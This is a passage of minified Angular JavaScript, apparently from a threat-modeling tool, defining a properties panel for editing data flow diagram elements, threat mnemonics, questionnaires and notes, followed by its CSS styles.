"),it(22,"circle",34),s(23,"\n "),u(),s(24,"\n "),u(),s(25,"\n "),s(26,"\n "),ne(27,fdt,215,49,"ng-template",35),s(28,"\n "),ln(),m(29,"button",22),he("click",function(){return be(e),Me(V(3).ChangeDataFlowDirection())}),s(30),oe(31,"translate"),u(),s(32,"\n "),Mt()}if(2&t){const e=Ti(3),i=V(3);g(2),at("matTooltip",re(4,12,"properties.FlowAnchor")),g(6),F("ngIf",8==i.AnchorCount),g(2),F("ngIf",8==i.AnchorCount),g(2),F("ngIf",8==i.AnchorCount),g(2),F("ngIf",8==i.AnchorCount),g(2),Rt("fill",i.GetIconColor()),g(2),Rt("fill",i.GetIconColor()),g(2),Rt("fill",i.GetIconColor()),g(2),Rt("fill",i.GetIconColor()),g(5),F("cdkConnectedOverlayOrigin",e)("cdkConnectedOverlayOpen",i.flowMenuIsOpen),g(3),ke(re(31,14,"properties.DataFlowChangeDirection"))}}function _dt(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){be(e);const n=V().$implicit;return Me(V(2).OnDiagramReference(n))}),s(1),u()}if(2&t){const e=V().$implicit,i=V(2);g(1),ke(i.GetDiagramReference(e))}}function gdt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;F("value",e.ID),g(1),ke(e.Name)}}function Cdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.target.value))}),s(1,"\n "),ne(2,gdt,2,2,"option",20),s(3,"\n "),u()}if(2&t){const e=V().$implicit,i=V(2);F("ngModel",i.GetValue(e)),g(2),F("ngForOf",i.GetAvailableDataFlowDiagrams())}}function ydt(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){be(e);const n=V().$implicit;return Me(V(2).OnDiagramReference(n))}),s(1),u()}if(2&t){const e=V().$implicit,i=V(2);g(1),ke(i.GetDiagramReference(e))}}function bdt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;F("value",e.ID),g(1),ke(e.Name)}}function Mdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.target.value))}),s(1,"\n "),ne(2,bdt,2,2,"option",20),s(3,"\n "),u()}if(2&t){const e=V().$implicit,i=V(2);F("ngModel",i.GetValue(e)),g(2),F("ngForOf",i.GetAvailableDiagrams())}}function vdt(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){be(e);const n=V().$implicit;return Me(V(2).OnElementName(n))}),s(1),u()}if(2&t){const e=V().$implicit,i=V(2);g(1),ke(i.GetElementName(e))}}function Adt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(4);F("value",e),g(1),ke(re(2,2,i.GetFlowTypeName(e)))}}function Tdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.target.value))}),s(1,"\n "),ne(2,Adt,3,4,"option",20),s(3,"\n "),u()}if(2&t){const e=V().$implicit,i=V(2);Ct("disable",!e.Editable),F("ngModel",i.GetValue(e)),g(2),F("ngForOf",i.GetFlowTypes())}}function Edt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;F("value",e.ID),g(1),ke(e.Name)}}function Ddt(t,a){if(1&t&&(m(0,"optgroup",58),s(1,"\n "),ne(2,Edt,2,2,"option",20),s(3,"\n "),u()),2&t){const e=a.$implicit,i=V(4);F("label",e.Name),g(2),F("ngForOf",i.GetAvailableInterfaces(e))}}function xdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=V().$implicit;return Me(V(2).SetInterface(r,n.target.value))}),s(1,"\n "),s(2,"\n "),m(3,"option"),s(4),oe(5,"translate"),u(),s(6,"\n "),ne(7,Ddt,4,2,"optgroup",57),s(8,"\n "),u()}if(2&t){const e=V().$implicit,i=V(2);let n;F("ngModel",null==(n=i.GetValue(e))?null:n.ID),g(4),ke(re(5,3,"properties.selectNone")),g(3),F("ngForOf",i.GetAvailableDevices())}}function wdt(t,a){if(1&t&&(m(0,"mat-option",63),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(e.Name)}}function Idt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-select",59),he("selectionChange",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.value))}),s(3,"\n "),m(4,"input",60),he("keyup",function(n){be(e);const r=V().$implicit,c=V(2);return Me(c.OnSearchMyData(n,c.GetValue(r)))}),oe(5,"translate"),u(),s(6,"\n "),ne(7,wdt,2,2,"mat-option",61),s(8,"\n "),u(),s(9,"\n "),m(10,"button",62),he("click",function(){be(e);const n=V().$implicit;return Me(V(2).AddMyData(n))}),oe(11,"translate"),s(12,"\n "),m(13,"mat-icon"),s(14,"add"),u(),s(15,"\n "),u(),s(16,"\n "),Mt()}if(2&t){const e=V().$implicit,i=V(2);g(2),F("disabled",!e.Editable)("value",i.GetValue(e)),g(2),at("placeholder",re(5,5,"general.Search")),g(3),F("ngForOf",i.GetMyDatas()),g(3),at("matTooltip",re(11,7,"general.Add"))}}function Rdt(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",64),he("change",function(){be(e);const n=V().$implicit;return Me(V(2).SetImpactCategory(n))}),u()}if(2&t){const e=V().$implicit;F("checked",V(2).GetImpactCategory(e))}}function Sdt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(4);F("value",e),g(1),ke(re(2,2,i.GetLineTypeName(e)))}}function kdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.target.value))}),s(1,"\n "),ne(2,Sdt,3,4,"option",20),s(3,"\n "),u()}if(2&t){const e=V().$implicit,i=V(2);Ct("disable",!e.Editable),F("ngModel",i.GetValue(e)),g(2),F("ngForOf",i.GetLineTypes())}}function Pdt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(4);F("value",e),g(1),ke(re(2,2,i.GetLMHName(e)))}}function Odt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.target.value))}),s(1,"\n "),ne(2,Pdt,3,4,"option",20),s(3,"\n "),u()}if(2&t){const e=V().$implicit,i=V(2);Ct("disable",!e.Editable),F("ngModel",i.GetValue(e)),g(2),F("ngForOf",i.GetLMHValues())}}function Ndt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;F("value",e.ID),g(1),ke(e.Name)}}function Ldt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=V().$implicit;return Me(V(2).SetPhysicalElement(r,n.target.value))}),s(1,"\n "),ne(2,Ndt,2,2,"option",20),s(3,"\n "),u()}if(2&t){const e=V().$implicit,i=V(2);let n;F("ngModel",null==(n=i.GetValue(e))?null:n.ID),g(2),F("ngForOf",i.GetAvailablePhysicalElements(i.selectedObject))}}function zdt(t,a){if(1&t){const e=Ye();m(0,"input",65),he("input",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.target.value))}),u()}if(2&t){const e=V().$implicit,i=V(2);F("spellcheck",i.dataService.HasSpellCheck)("value",i.GetValue(e))("disabled",!e.Editable)}}function Wdt(t,a){if(1&t&&(m(0,"mat-option",63),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(e.Name)}}function Fdt(t,a){if(1&t){const e=Ye();m(0,"mat-select",66),he("selectionChange",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.value))}),s(1,"\n "),ne(2,Wdt,2,2,"mat-option",61),s(3,"\n "),u()}if(2&t){const e=V().$implicit,i=V(2);F("value",i.GetValue(e)),g(2),F("ngForOf",i.GetProtocols())}}function Vdt(t,a){if(1&t){const e=Ye();m(0,"button",67),he("click",function(){return be(e),Me(V(3).OpenNotes())}),s(1),oe(2,"translate"),u()}if(2&t){const e=V(3);F("matBadge",e.NotesBadge())("matBadgeHidden",0==e.NotesBadge().length),g(1),ke(re(2,3,"properties.openNotes"))}}function Bdt(t,a){if(1&t){const e=Ye();m(0,"button",67),he("click",function(){return be(e),Me(V(3).OpenQuestionnaire())}),s(1),oe(2,"translate"),u()}if(2&t){const e=V(3);F("matBadge",e.QuestionnaireBadge())("matBadgeHidden",0==e.QuestionnaireBadge().length),g(1),ke(re(2,3,"properties.openQuestionnaire"))}}function Hdt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;F("value",e.ID),g(1),ke(e.Name)}}function Udt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=V().$implicit;return Me(V(2).SetType(r,n.target.value))}),s(1,"\n "),ne(2,Hdt,2,2,"option",20),s(3,"\n "),u()}if(2&t){const e=V(3);F("ngModel",e.GetStencilType()),g(2),F("ngForOf",e.GetAvailableTypes(e.selectedObject))}}function qdt(t,a){if(1&t){const e=Ye();m(0,"textarea",68),he("input",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.target.value))}),u()}if(2&t){const e=V().$implicit,i=V(2);F("spellcheck",i.dataService.HasSpellCheck)("value",i.GetValue(e))("disabled",!e.Editable)}}function Gdt(t,a){if(1&t){const e=Ye();m(0,"input",65),he("input",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.target.value))}),u()}if(2&t){const e=V().$implicit,i=V(2);F("spellcheck",i.dataService.HasSpellCheck)("value",i.GetValue(e))("disabled",!e.Editable)}}function jdt(t,a){if(1&t){const e=Ye();m(0,"input",65),he("input",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.target.value))}),u()}if(2&t){const e=V().$implicit,i=V(2);Ct("invalid",i.GetValidator(e)),F("spellcheck",i.dataService.HasSpellCheck)("value",i.GetValue(e))("disabled",!e.Editable)}}function Qdt(t,a){if(1&t&&(m(0,"tr"),s(1,"\n "),m(2,"td")(3,"span",7),oe(4,"translate"),s(5),oe(6,"translate"),u()(),s(7,"\n "),m(8,"td"),s(9,"\n "),s(10,"\n "),ne(11,Ylt,4,4,"select",8),s(12,"\n "),s(13,"\n "),ne(14,Jlt,3,3,"button",9),s(15,"\n "),s(16,"\n "),ne(17,Zlt,1,2,"mat-checkbox",10),s(18,"\n "),s(19,"\n "),ne(20,tdt,4,4,"select",8),s(21,"\n "),s(22,"\n "),ne(23,pdt,33,16,"ng-container",6),s(24,"\n "),s(25,"\n "),ne(26,_dt,2,1,"button",11),s(27,"\n "),ne(28,Cdt,4,2,"select",12),s(29,"\n "),s(30,"\n "),ne(31,ydt,2,1,"button",11),s(32,"\n "),ne(33,Mdt,4,2,"select",12),s(34,"\n "),s(35,"\n "),ne(36,vdt,2,1,"button",11),s(37,"\n "),s(38,"\n "),ne(39,Tdt,4,4,"select",8),s(40,"\n "),s(41,"\n "),ne(42,xdt,9,5,"select",12),s(43,"\n "),s(44,"\n "),ne(45,Idt,17,9,"ng-container",6),s(46,"\n "),s(47,"\n "),ne(48,Rdt,1,1,"mat-checkbox",13),s(49,"\n "),s(50,"\n "),ne(51,kdt,4,4,"select",8),s(52,"\n "),s(53,"\n "),ne(54,Odt,4,4,"select",8),s(55,"\n "),s(56,"\n "),ne(57,Ldt,4,2,"select",12),s(58,"\n "),s(59,"\n "),ne(60,zdt,1,3,"input",14),s(61,"\n "),s(62,"\n "),ne(63,Fdt,4,2,"mat-select",15),s(64,"\n "),s(65,"\n "),ne(66,Vdt,3,5,"button",16),s(67,"\n "),s(68,"\n "),ne(69,Bdt,3,5,"button",16),s(70,"\n "),s(71,"\n "),ne(72,Udt,4,2,"select",12),s(73,"\n "),s(74,"\n "),ne(75,qdt,1,3,"textarea",17),s(76,"\n "),s(77,"\n "),ne(78,Gdt,1,3,"input",14),s(79,"\n "),s(80,"\n "),ne(81,jdt,1,5,"input",18),s(82,"\n "),u(),s(83,"\n "),u()),2&t){const e=a.$implicit;g(3),at("matTooltip",re(4,27,e.Tooltip)),g(2),ke(re(6,29,e.DisplayName)),g(6),F("ngIf","Arrow Position"==e.Type),g(3),F("ngIf","Assign Number To Asset"==e.Type),g(3),F("ngIf","Check Box"==e.Type),g(3),F("ngIf","Device Interface Name"==e.Type),g(3),F("ngIf","Data Flow Change Direction"==e.Type),g(3),F("ngIf","Data Flow Diagram Reference"==e.Type&&!e.Editable),g(2),F("ngIf","Data Flow Diagram Reference"==e.Type&&e.Editable),g(3),F("ngIf","Diagram Reference"==e.Type&&!e.Editable),g(2),F("ngIf","Diagram Reference"==e.Type&&e.Editable),g(3),F("ngIf","Element Name"==e.Type),g(3),F("ngIf","Flow Type"==e.Type),g(3),F("ngIf","Interface Element Select"==e.Type),g(3),F("ngIf","Data Select"==e.Type),g(3),F("ngIf","Impact Category"==e.Type),g(3),F("ngIf","Line Type"==e.Type),g(3),F("ngIf","Low Medium High Select"==e.Type),g(3),F("ngIf","Physical Element Select"==e.Type),g(3),F("ngIf","Port Box"==e.Type),g(3),F("ngIf","Protocol Select"==e.Type),g(3),F("ngIf","Open Notes"==e.Type),g(3),F("ngIf","Open Questionnaire"==e.Type),g(3),F("ngIf","Stencil Type"==e.Type),g(3),F("ngIf","Text Area"==e.Type),g(3),F("ngIf","Text Box"==e.Type),g(3),F("ngIf","Text Box Validator"==e.Type)}}function $dt(t,a){if(1&t){const e=Ye();m(0,"span",70),s(1,"\n "),m(2,"button",71),he("click",function(){const r=be(e).$implicit;return Me(V(4).AddMnemonicThreat(r))}),s(3),u(),s(4,"\n "),u()}if(2&t){const e=a.$implicit,i=V(4);g(2),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("primary-color",e.AffectedElementTypes.includes(i.selectedElement.Type.ElementTypeID)),at("matTooltip",i.GetLetterTooltip(e)),g(1),ke(e.Letter)}}function Kdt(t,a){if(1&t&&(m(0,"tr"),s(1,"\n "),m(2,"td"),s(3),u(),s(4,"\n "),m(5,"td"),s(6,"\n "),ne(7,$dt,5,6,"span",69),s(8,"\n "),u(),s(9,"\n "),u()),2&t){const e=a.$implicit;g(3),ke(e.Name),g(4),F("ngForOf",e.Letters)}}function Xdt(t,a){if(1&t&&(bt(0),s(1,"\n "),ne(2,Kdt,10,2,"tr",5),s(3,"\n "),Mt()),2&t){const e=V(2);g(2),F("ngForOf",e.GetMnemonics())}}function Ydt(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n "),m(2,"td",72)(3,"button",22),he("click",function(){return be(e),Me(V(2).CreateUseCaseDiagram())}),s(4),oe(5,"translate"),u()(),s(6,"\n "),u()}2&t&&(g(4),ke(re(5,1,"properties.createDataFlowDiagram")))}function Jdt(t,a){if(1&t&&(m(0,"table",2),s(1,"\n "),m(2,"colgroup"),s(3,"\n "),it(4,"col",3),s(5,"\n "),it(6,"col",4),s(7,"\n "),u(),s(8,"\n "),ne(9,Qdt,84,31,"tr",5),s(10,"\n "),ne(11,Xdt,4,1,"ng-container",6),s(12,"\n "),ne(13,Ydt,7,3,"tr",6),s(14,"\n "),u()),2&t){const e=V();g(9),F("ngForOf",e.selectedObject.GetProperties()),g(2),F("ngIf",e.IsDFDElement()),g(2),F("ngIf",e.IsUseCase())}}let AZ=(()=>{class t{constructor(e,i,n,r,c,d,T){this.theme=e,this.dataService=i,this.dialog=n,this.threatEngine=r,this.locStorage=c,this.router=d,this.activatedRoute=T,this.searchCounter=0,this.AnchorDirections=_i,this.flowMenuIsOpen=!1,this.selectedObjectChanged=new Tt,this.openQuestionnaire=new Tt}get Diagram(){return this.dataObject}get AnchorCount(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT);return i&&(e=JSON.parse(i)),e&&this.Diagram&&null!=e[this.Diagram.DiagramType]?e[this.Diagram.DiagramType]:4}get selectedObject(){return this._selectedObject}set selectedObject(e){this._selectedObject=e,this.flowMenuIsOpen=!1,setTimeout(()=>{Array.from(document.getElementsByTagName("textarea")).forEach(i=>{i.style.height="auto",i.style.height=i.scrollHeight.toString()+"px"})},10)}get selectedElement(){return this._selectedObject}get selectedFlow(){return this._selectedObject}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.FocusFirst())}FocusFirst(){const e=document.getElementById("proptable");e&&e.children.length>0&&e.children[1].children.length>0&&e.children[1].children[1].children.length>0&&e.children[1].children[1].children[0].select()}GetValue(e){return"Name"==e.ID?null!=this.selectedObject.Ref?this.selectedObject.Ref.NameRaw:this.selectedObject.NameRaw:this.selectedObject.GetProperty(e.ID)}GetValidator(e){return this.selectedObject[e.Callback]()}SetValue(e,i){this.selectedObject.SetProperty(e.ID,i)}SetType(e,i){if(this.selectedObject instanceof lc){let n=this.dataService.Config.GetStencilTypes().find(r=>r.ID==i);this.selectedObject.SetProperty(e.ID,n)}else console.error("Cant set type of non DFDElement")}SetPhysicalElement(e,i){this.selectedObject instanceof lc&&(this.selectedObject.PhysicalElement=this.dataService.Project.GetDFDElement(i))}GetStencilType(){return this.selectedObject instanceof lc?this.selectedObject.GetProperty("Type").ID:null}GetImpactCategory(e){const i=this.selectedObject.Data[e.ID.split("-")[0]],n=Number(e.ID.split("-")[1]);return i.includes(n)}SetImpactCategory(e){const i=Number(e.ID.split("-")[1]),n=this.selectedObject.Data[e.ID.split("-")[0]],r=n.indexOf(i);r>=0?n.splice(r,1):n.push(i)}GetElementName(e){var i;return null===(i=this.selectedObject.GetProperty(e.ID))||void 0===i?void 0:i.Name}OnElementName(e){let i=this.selectedObject.GetProperty(e.ID);i&&i instanceof Np&&this.selectedObjectChanged.emit(i)}GetDiagramReference(e){let i=this.selectedObject.GetProperty(e.ID);if(i){let n=this.dataService.Project.GetDiagram(i);if(n)return n.Name}return""}OnDiagramReference(e){let i=this.selectedObject.GetProperty(e.ID);if(i){const n={viewID:i};this.selectedObject.Ref&&(n.elementID=this.selectedObject.Ref.ID),this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:n,replaceUrl:!0})}}GetAvailableDataFlowDiagrams(){const e=this.dataService.Project.FindDiagramOfElement(this.selectedObject.ID);return this.dataService.Project.GetDiagrams().filter(i=>i.ID!=e.ID&&i.DiagramType==xn.DataFlow)}GetAvailableDiagrams(){const e=this.dataService.Project.FindDiagramOfElement(this.selectedObject.ID);return this.dataService.Project.GetDiagrams().filter(i=>i.ID!=e.ID&&i.DiagramType==e.DiagramType)}GetAvailablePhysicalElements(e){return e instanceof v2?this.dataService.Project.GetDFDElements().filter(i=>i.IsPhysical&&i.GetProperty("Type").ElementTypeID==e.GetProperty("Type").ElementTypeID+1):e instanceof M5?this.dataService.Project.GetDFDElements().filter(i=>i.Type.ElementTypeID==Et.PhyTrustArea):[]}GetAvailableDevices(){return this.dataService.Project.GetDevices()}GetAvailableInterfaces(e){return e.HardwareDiagram.Elements.GetChildrenFlat().filter(i=>i.GetProperty("Type").ElementTypeID==Et.Interface)}SetInterface(e,i){this.selectedObject.SetProperty(e.ID,this.dataService.Project.GetDFDElement(i))}GetAvailableTypes(e){return e instanceof lc?this.dataService.Config.GetStencilTypes().filter(i=>i.ElementTypeID==e.GetProperty("Type").ElementTypeID):[]}GetProtocols(){return this.dataService.Config.GetProtocols()}AddMyData(e){let i=this.dataService.Project.CreateMyData(null);this.dialog.OpenAddMyDataDialog(i).subscribe(n=>{if(n){let r=this.selectedObject.GetProperty(e.ID);r.push(i),this.selectedObject.SetProperty(e.ID,r)}else this.dataService.Project.DeleteMyData(i)})}GetMyDatas(){return null==this.myDatas&&(this.myDatas=this.dataService.Project.GetMyDatas()),this.myDatas}OnSearchMyData(e,i){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.myDatas=null,this.GetMyDatas();const n=e.target.value.toLowerCase();this.myDatas=this.myDatas.filter(r=>i.includes(r)||r.Name.toLowerCase().includes(n))}},250)}GetFlowTypes(){return EG.GetKeys()}GetFlowTypeName(e){return EG.ToString(e)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}GetLineTypes(){return AG.GetKeys()}GetLineTypeName(e){return AG.ToString(e)}GetArrowPositions(){return TG.GetKeys()}GetArrowPositionName(e){return TG.ToString(e)}GetDeviceInterfaceNames(){return class pwe{static GetKeys(){return[So.None,So.HumanInterface,So.MachineInterface,So.Environment]}}.GetKeys()}GetMnemonics(){return this.dataService.Config.GetStencilThreatMnemonics()}GetLetterTooltip(e){var i;let n=e.Name;return(null===(i=e.Description)||void 0===i?void 0:i.length)>0&&(n+="\n\n"+e.Description),n}AddMnemonicThreat(e){this.threatEngine.AddMnemonicThreat(this.selectedElement,e)}AssignNumberToAsset(){const e=this.selectedObject;e.IsNewAsset=!0,e.Number=0==this.dataService.Project.GetNewAssets().length?"1":(Math.max(...this.dataService.Project.GetNewAssets().map(i=>Number(i.Number)).filter(i=>!isNaN(i)))+1).toString()}ChangeDataFlowDirection(){this.selectedElement.ChangeDirection()}OpenNotes(){this.dialog.OpenNotesDialog(this.selectedObject.Notes,!0,!1,!0,!0)}OpenQuestionnaire(){this.openQuestionnaire.emit(this.selectedObject)}QuestionnaireBadge(){if(this.selectedObject instanceof rf&&this.selectedObject.IsActive){const e=Object.values(this.selectedObject.ThreatQuestions).filter(i=>null==i).length;if(e>0)return e.toString()}return""}NotesBadge(){if(this.selectedObject instanceof rf){const e=this.selectedObject.Notes.length;if(e>0)return e.toString()}return""}CreateUseCaseDiagram(){let e=this.dataService.Project.CreateDiagram(xn.DataFlow);e.Name=this.selectedObject.Name,this.selectedObject.DataFlowDiagramID=e.ID,setTimeout(()=>{this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:{viewID:e.ID},replaceUrl:!0})},500)}GetIconColor(e=!1){return e?this.theme.Primary:this.theme.IsDarkMode?"#FFF":"#000"}IsDFDElement(){return this.selectedObject instanceof lc}IsComponent(){return this.selectedObject instanceof rf}IsUseCase(){return this.selectedObject instanceof b5}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(RT),Ee(_r),Ee(Oo),Ee(Tl))},t.\u0275cmp=Wt({type:t,selectors:[["app-properties"]],hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{dataObject:"dataObject",selectedObject:"selectedObject"},outputs:{selectedObjectChanged:"selectedObjectChanged",openQuestionnaire:"openQuestionnaire"},decls:4,vars:1,consts:[[2,"width","100%","height","100%","font-size","small"],["id","proptable","style","padding: 10px; width: 100%;",4,"ngIf"],["id","proptable",2,"padding","10px","width","100%"],["span","1",2,"width","calc(100% - 200px)"],["span","1",2,"width","200px"],[4,"ngFor","ngForOf"],[4,"ngIf"],["matTooltipShowDelay","1000",3,"matTooltip"],["style","width: 100%;",3,"disable","ngModel","change",4,"ngIf"],["mat-raised-button","",3,"click",4,"ngIf"],["color","primary",3,"checked","disabled","change",4,"ngIf"],["class","buttonAsText primary-color",3,"click",4,"ngIf"],["style","width: 100%;",3,"ngModel","change",4,"ngIf"],["color","primary",3,"checked","change",4,"ngIf"],["type","text","style","width: 100%;",3,"spellcheck","value","disabled","input",4,"ngIf"],["class","matSelect","style","width: 100%;","multiple","",3,"value","selectionChange",4,"ngIf"],["mat-raised-button","","matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",3,"matBadge","matBadgeHidden","click",4,"ngIf"],["type","text","style","width: 100%; font-size: inherit;",3,"spellcheck","value","disabled","input",4,"ngIf"],["type","text","style","width: 100%;",3,"spellcheck","invalid","value","disabled","input",4,"ngIf"],[2,"width","100%",3,"ngModel","change"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["mat-raised-button","",3,"click"],["color","primary",3,"checked","disabled","change"],["mat-icon-button","","cdkOverlayOrigin","","matTooltipShowDelay","1000",1,"iconBtn",2,"margin-right","5px",3,"matTooltip","click"],["trigger","cdkOverlayOrigin"],["xmlns","http://www.w3.org/2000/svg","width","25","height","25","version","1.1"],["cx","3","cy","3","r","2",4,"ngIf"],["cx","3","cy","20","r","2",4,"ngIf"],["cx","20","cy","3","r","2",4,"ngIf"],["cx","20","cy","20","r","2",4,"ngIf"],["cx","11.5","cy","3","r","2"],["cx","11.5","cy","20","r","2"],["cx","3","cy","11.5","r","2"],["cx","20","cy","11.5","r","2"],["cdkConnectedOverlay","",3,"cdkConnectedOverlayOrigin","cdkConnectedOverlayOpen"],["cx","3","cy","3","r","2"],["cx","3","cy","20","r","2"],["cx","20","cy","3","r","2"],["cx","20","cy","20","r","2"],[1,"flowAnchorOverlay",2,"padding","3px"],[1,"flowAnchorOverlay"],["mat-icon-button","","class","anchorBtn",3,"click",4,"ngIf"],[2,"min-width","40px","width","100%","text-align","center"],["mat-icon-button","",1,"anchorBtn",3,"click"],["xmlns","http://www.w3.org/2000/svg","width","18","height","18","version","1.1"],["fill","#d9d9d9","cx","8","cy","8","r","8"],["x1","2.5","y1","2.5","x2","13.5","y2","13.5",2,"stroke-width","2"],["x1","2.5","y1","13.5","x2","13.5","y2","2.5",2,"stroke-width","2"],[2,"min-width","40px","width","100%","text-align","center","font-size","small"],[1,"flowAnchorOverlay",2,"margin-top","3px"],["mat-icon-button","","matTooltipShowDelay","1000",1,"anchorBtn",2,"position","absolute","top","-8px","right","-8px","width","20px","height","20px",3,"matTooltip","click"],["xmlns","http://www.w3.org/2000/svg","width","20","height","20","version","1.1"],["cx","9","cy","9","r","8",2,"stroke-width","2"],["x1","3.5","y1","3.5","x2","14.5","y2","14.5",2,"stroke-width","2"],["x1","3.5","y1","14.5","x2","14.5","y2","3.5",2,"stroke-width","2"],[1,"buttonAsText","primary-color",3,"click"],[3,"label",4,"ngFor","ngForOf"],[3,"label"],["no-space","","multiple","",1,"matSelect",2,"width","calc(100% - 22px)",3,"disabled","value","selectionChange"],["matInput","",1,"searchBox",3,"placeholder","keyup"],["class","matOption","color","primary",3,"value",4,"ngFor","ngForOf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"height","20px","width","20px","line-height","20px",3,"matTooltip","click"],["color","primary",1,"matOption",3,"value"],["color","primary",3,"checked","change"],["type","text",2,"width","100%",3,"spellcheck","value","disabled","input"],["multiple","",1,"matSelect",2,"width","100%",3,"value","selectionChange"],["mat-raised-button","","matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",3,"matBadge","matBadgeHidden","click"],["type","text",2,"width","100%","font-size","inherit",3,"spellcheck","value","disabled","input"],["style","margin-right: 5px;",4,"ngFor","ngForOf"],[2,"margin-right","5px"],["matTooltipShowDelay","1000",1,"buttonAsText",2,"font-size","small",3,"matTooltip","click"],["colspan","2"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n "),ne(2,Jdt,15,3,"table",1),s(3,"\n"),u()),2&e&&(g(2),F("ngIf",i.selectedObject))},dependencies:[Zi,Ri,pm,_m,Ed,Ta,Ea,oa,Hh,br,da,Nr,yr,Xa,Pa,i8,t8,KT,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%], .matOption[_ngcontent-%COMP%] .mat-pseudo-checkbox-checked{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .flowAnchorOverlay-light[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .flowAnchorOverlay-dark[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] 